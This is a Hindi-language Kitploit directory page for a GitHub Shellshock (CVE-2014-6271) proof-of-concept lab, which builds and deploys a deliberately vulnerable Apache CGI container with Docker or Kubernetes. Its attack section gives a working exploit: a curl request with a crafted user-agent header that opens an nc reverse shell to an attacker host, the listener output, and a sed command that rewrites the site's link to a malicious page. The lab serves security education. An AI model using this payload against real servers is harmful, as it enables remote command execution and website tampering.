Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2014-6271-Apache-Debian — This Repo is PoC environment of CVE-2014-6271(https://nvd.nist.gov/vuln/detail/cve-2014-6271). | Kitploit
उपकरण/GitHubGitHub/mochizuki875/cve-2014-6271-apache-debian
Container SecurityVulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubmochizuki875/cve-2014-6271-apache-debian

CVE-2014-6271-Apache-Debian

This Repo is PoC environment of CVE-2014-6271(https://nvd.nist.gov/vuln/detail/cve-2014-6271).

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
14 साल पहलेअभी तक समीक्षित नहीं

CVE-2014-6271-Apache-Debian

अवलोकन

यह रिपॉजिटरी CVE-2014-6271 का PoC वातावरण है।
आप apache2 कंटेनर इमेज का उपयोग करके कमजोरी सहित वेब सेवा तैनात कर सकते हैं।

तैयारी

इमेज बिल्ड

Dockerfile से असुरक्षित इमेज बनाएँ।

root@kitploit:~
# docker build -t cve-2014-6271-apache-debian:buster ./insecure-base-image/
# docker build -t training-website-poc:v1.0 ./web-insecure/

PoC कंटेनर तैनात करें

Docker

PoC कंटेनर को डॉकर कंटेनर के रूप में तैनात करें।

root@kitploit:~
# docker run -d -p 8080:80 training-website-poc:v1.0

Kubernetes

PoC कंटेनर को k8s पॉड और सेवा के रूप में तैनात करें।

root@kitploit:~
# kubectl apply -f web-insecure/k8s-manifest/web-insecure-pod.yml
# kubectl apply -f web-insecure/k8s-manifest/web-insecure-svc.yml

PoC वेब सेवा तक पहुँचें

तैनाती पूरी होने के बाद, आप निम्न URL को ब्राउज़र से एक्सेस करके वेब पृष्ठ ब्राउज़ कर सकते हैं।
आप वेब पृष्ठ के नीचे "Click!" लिंक पर क्लिक करके k8s लैब वातावरण तक पहुँच सकते हैं।

Docker

root@kitploit:~
http://<docker host IP>:8080

Kubernetes

root@kitploit:~
http://<k8s service endpoint>:<k8s service port>

हमला प्रदर्शन

इस प्रदर्शन में, आप CVE-2014-6271 की कमजोरी का शोषण करके हमलावर होस्ट (कंटेनर के बाहर) से वेब पृष्ठ बदल सकते हैं।

हमलावर होस्ट से ये कमांड निष्पादित करें।

टर्मिनल 1

root@kitploit:~
# nc -nvlp 5050

टर्मिनल 2
※इस मामले में, हम PoC कंटेनर को Docker का उपयोग करके तैनात करते हैं। Kubernetes के मामले में, URL http://<k8s service endpoint>:<k8s service port> होना चाहिए।

root@kitploit:~
# curl -H "user-agent: () { :; }; echo; /bin/nc -e /bin/bash <Attacker Host IP> 5050" http://<docker host IP>:8080/cgi-bin/vulnerable

उसके बाद, आप देख सकते हैं कि PoC कंटेनर का /bin/bash टर्मिनल 1 में निष्पादित किया जा सकता है।

root@kitploit:~
Listening on 0.0.0.0 5050
Connection received on 172.17.0.2 38926
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),1000(wheel)
pwd
/usr/lib/cgi-bin

वेब पृष्ठ के "Click!" लिंक को बदलें।
इस मामले में, हम दुर्भावनापूर्ण लिंक के लिए डमी पृष्ठ का उपयोग करते हैं।

root@kitploit:~
sudo sed -i -e 's/https\:\/\/www.katacoda.com\/courses\/kubernetes/danger.html/' /var/www/html/index.html

वेब पृष्ठ को पुनः एक्सेस करें और वेब पृष्ठ के नीचे "Click!" लिंक पर क्लिक करें।

root@kitploit:~
http://<docker host IP>:8080

संदर्भ

https://github.com/hmlio/vaas-cve-2014-6271
https://github.com/opsxcq/exploit-CVE-2014-6271

टूल डाउनलोड करें